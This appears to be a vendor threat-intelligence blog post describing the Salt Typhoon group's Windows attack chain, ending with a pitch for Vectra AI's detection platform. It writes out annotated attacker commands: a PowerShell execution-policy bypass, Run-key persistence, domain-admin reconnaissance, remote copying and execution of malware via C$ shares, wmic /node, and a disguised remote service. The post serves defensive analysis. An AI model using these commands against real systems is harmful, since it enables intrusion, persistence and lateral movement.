Salt Typhoon follows a structured attack sequence using built-in Windows tools to avoid detection. Here’s a breakdown of their tactics and the commands they use.
Salt Typhoon primarily exploits public-facing servers with known vulnerabilities. Instead of relying on phishing, they prefer N-day and zero-day exploits to gain remote code execution (RCE).
Once they gain access, they execute malicious payloads and ensure persistence using Windows tools.
They use PowerShell to execute scripts without restrictions:
powershell -ex bypass -c "<password>"
-ex bypass
: Overrides execution policy to allow the script to run.<password>
: Key used to decrypt the script, which is usually encrypted.To ensure malware runs every time a user logs in, they add a registry key:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<malware_name>" /t REG_SZ /d "<malware_path>" /f
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
: Registry location for auto-start programs.REG_SZ
: Specifies a string value (the malware path)./f
: Forces execution without confirmation.Salt Typhoon gathers intelligence about the environment before escalating privileges.
wmic process get name,processid,commandline
net group
to Identify Domain Adminscmd /c "net group 'domain admins' /domain"
/domain
: Ensures the query applies to the Active Directory domain instead of just the local machine.After reconnaissance, they escalate privileges and steal credentials.
They install tools like:
They deploy Cobalt Strike, a legitimate red teaming tool, to gain SYSTEM privileges and move deeper into the network.
Salt Typhoon spreads across the network using various Windows utilities.
copy \\<target_ip>\C$\Windows\Temp\malware.bat
\\<target_ip>
to specify a shared folder on another machine..bat
) to be executed remotely.wmic /node:<target_ip> process call create "cmd /c C:\Windows\Temp\malware.bat"
/node:<target_ip>
: Specifies the target machine.process call create
: Runs a process remotely.cmd /c
: Executes the copied batch file.sc create
)sc \\<target_ip> create VGAuthtools binpath= "C:\Windows\System32\installutil.exe C:\Windows\Temp\malware.exe" start= auto type= own
sc
: Windows service control utility.\\<target_ip>
: Creates the service remotely on another machine.VGAuthtools
: Disguises malware as a legitimate tool.binpath
: Uses installutil.exe
(a legitimate Windows tool) to execute the malicious payload.start= auto
: Ensures persistence by restarting the malware every time the machine reboots.Salt Typhoon establishes persistent communication with their C2 servers.
Salt Typhoon avoids detection by using trusted platforms to upload stolen data:
Salt Typhoon continuously monitors compromised networks and steals sensitive data over an extended period.
----
Vectra AI’s platform focuses on real attack behaviors, not just known threats. This allows it to detect Salt Typhoon-like activity even when attackers use built-in Windows tools.
Learn more about our AI-driven detections or try our self-guided demo.